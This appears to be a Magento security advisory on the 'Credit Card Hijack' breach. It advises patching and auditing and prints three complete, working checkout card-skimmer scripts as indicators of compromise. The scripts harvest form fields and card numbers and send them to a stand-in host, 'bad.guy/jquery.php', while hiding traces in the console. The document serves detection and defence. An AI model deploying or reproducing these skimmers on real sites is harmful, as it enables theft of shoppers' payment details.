How to address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.
First made public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Attackers who have compromised a store (typically through an unpatched vulnerability) inject malicious JavaScript into the store's pages; that script then runs in the browsers of the store's visitors on checkout pages, captures the payment details they enter, and sends them to an attacker-controlled server.
Read How to Improve the Security of Your Magento Store.
ATTENTION: In addition to the actions below, we strongly recommend that you enlist the services of a Magento developer or security specialist to audit your code.
Take the following actions to safeguard the security of your store and your customers’ data.
A store running anything other than the most current version, with all released security patches applied, is not secure; the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.
Use the procedure below to audit and secure your admin users. The scripts that follow are samples of the injected skimmer code found on compromised stores — they are indicators of compromise, not something to install or run; search your store for this code, or for distinctive fragments of it, to check whether your site is affected.
<!--
  MALICIOUS SAMPLE - indicator of compromise only. Do not deploy, load or execute.
  Two skimmer scripts follow. Both harvest the values typed into checkout form
  fields and POST them with XMLHttpRequest to an attacker-controlled endpoint,
  shown here as https://bad.guy/jquery.php (the host name appears to be a
  placeholder substituted by the advisory; live samples will differ).

  Script 1 (jQuery-based):
   - jj(name) returns the value of the named cookie from document.cookie.
   - If no "SESSIID" cookie exists, one is set to the current timestamp,
     giving the attacker a per-victim identifier.
   - On every <button> click, when window.location matches /onepage|checkout/,
     every non-empty input/select/textarea value is concatenated as
     name=value&... (fields without a name are keyed by index). The payload is
     flagged asd=1 if it contains a run of 13-16 digits (a likely card number;
     note the regex input has the letter "s" stripped via /s/g, presumably a
     typo for \s), and is POSTed together with the page URL (utmp=) and the
     SESSIID cookie (cookie=). The endpoint URL is produced by a jQuery
     html()/text() round-trip, apparently to defeat naive string matching.
     console.clear() is called afterwards to hide traces from the console.
   - As reproduced on this page, the first script has an unbalanced ")" after
     getTime(); a correctly parenthesised copy of the same script appears
     further down the page.

  Script 2 (plain DOM, no jQuery):
   - On window.onload, when the URL matches /onepage/, send() is started.
   - send() attaches clk() as a click handler on links with javascript:void(0)
     hrefs, buttons, inputs and .btn/.button elements (skipping text, select,
     checkbox, password and radio types) and as a submit handler on every form.
     clk() appends every non-empty form value as name=value& to the global snd
     (the computed fallback name nme is never used, and because snd starts as
     null the first payload is prefixed with the string "null").
   - When snd is non-null, the data is POSTed as data=... with the same 13-16
     digit flag (asd=) and a fixed id_id=ano.nym marker, the console is
     cleared, snd is reset to null, and send() re-schedules itself every 150 ms
     through a string-argument setTimeout, so the payload is exfiltrated on the
     next tick after any hooked click or submit.
-->
<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")|| document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html ("https://bad.guy/jquery.php ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"), u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script><script> var snd =null; window.onload = function () { if((new RegExp('onepage')).test(window.location)) { send(); } }; function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox"); for (var i=0;i<inp.length;i++){ if(inp[i].value.length>0) { var nme=inp[i].name; if(nme=='') { nme=i; } snd+=inp[i].name+'='+inp[i].value+'&'; } } } function send() { var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button"); for (var i=0;i<btn.length;i++){ var b=btn[i]; if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') { if(b.addEventListener) { b.addEventListener("click", clk, false); }else { b.attachEvent('onclick', clk); } } } var frm=document.querySelectorAll("form"); for (var i=0;i<frm.length;i++){ if(frm[i].addEventListener) { frm[i].addEventListener("submit", clk, false); }else { frm[i].attachEvent('onsubmit', clk); } } if(snd!=null) { console.clear(); var cc = new RegExp("[0-9]{13,16}"); var asd="0"; if(cc.test(snd)){ asd="1" ; } var http = new XMLHttpRequest(); http.open("POST","https://bad.guy/jquery.php",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym"); console.clear(); } snd=null; setTimeout('send()', 150); } </script>
<!--
  MALICIOUS SAMPLE - indicator of compromise only. Do not deploy, load or execute.
  This is a formatted (de-minified) copy of the jQuery-based skimmer shown above,
  with the parenthesis around the cookie assignment intact; the behavior is the same:
   - jj(name) reads a cookie value from document.cookie.
   - If no "SESSIID" cookie exists, one is set to the current timestamp as a
     per-victim identifier.
   - On every <button> click, when window.location matches /onepage|checkout/,
     all non-empty input/select/textarea values are serialised as name=value&...,
     flagged asd=1 when a 13-16 digit run is present (the letter "s" is stripped
     first via /s/g, presumably a typo for \s), and POSTed via XMLHttpRequest to
     https://bad.guy/jquery.php (the host name appears to be an advisory
     placeholder) together with the page URL (utmp=) and the SESSIID cookie.
   - The endpoint URL is built through a jQuery html()/text() round-trip,
     apparently to evade simple string matching; console.clear() runs after the
     send to hide traces.
  Useful strings to search your store for: "SESSIID", "jquery.php", "asd=", "utmp=".
-->
<script> function jj(e) { var t = "; " + document.cookie , o = t.split("; " + e + "="); return 2 == o.length ? o.pop().split(";").shift() : void 0 } jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()) , jQuery(function (e) { e("button").on("click", function () { var t = "" , o = "post" , n = window.location; if (new RegExp("onepage|checkout").test(n)) { for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) { var a = c[i].name; "" == a && (a = i) , t += a + "=" + c[i].value + "&" } if (t) { var l = new RegExp("[0-9]{13,16}") , u = new XMLHttpRequest; u.open(o, e("<div />").html("https://bad.guy/jquery.php ").text(), !0) , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded") , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID")) , console.clear() } } }) }); </script>
Attackers are constantly improving their methods. To help secure your store against future exploits and attacks, follow the guidelines provided in How to Improve the Security of Your Magento Store.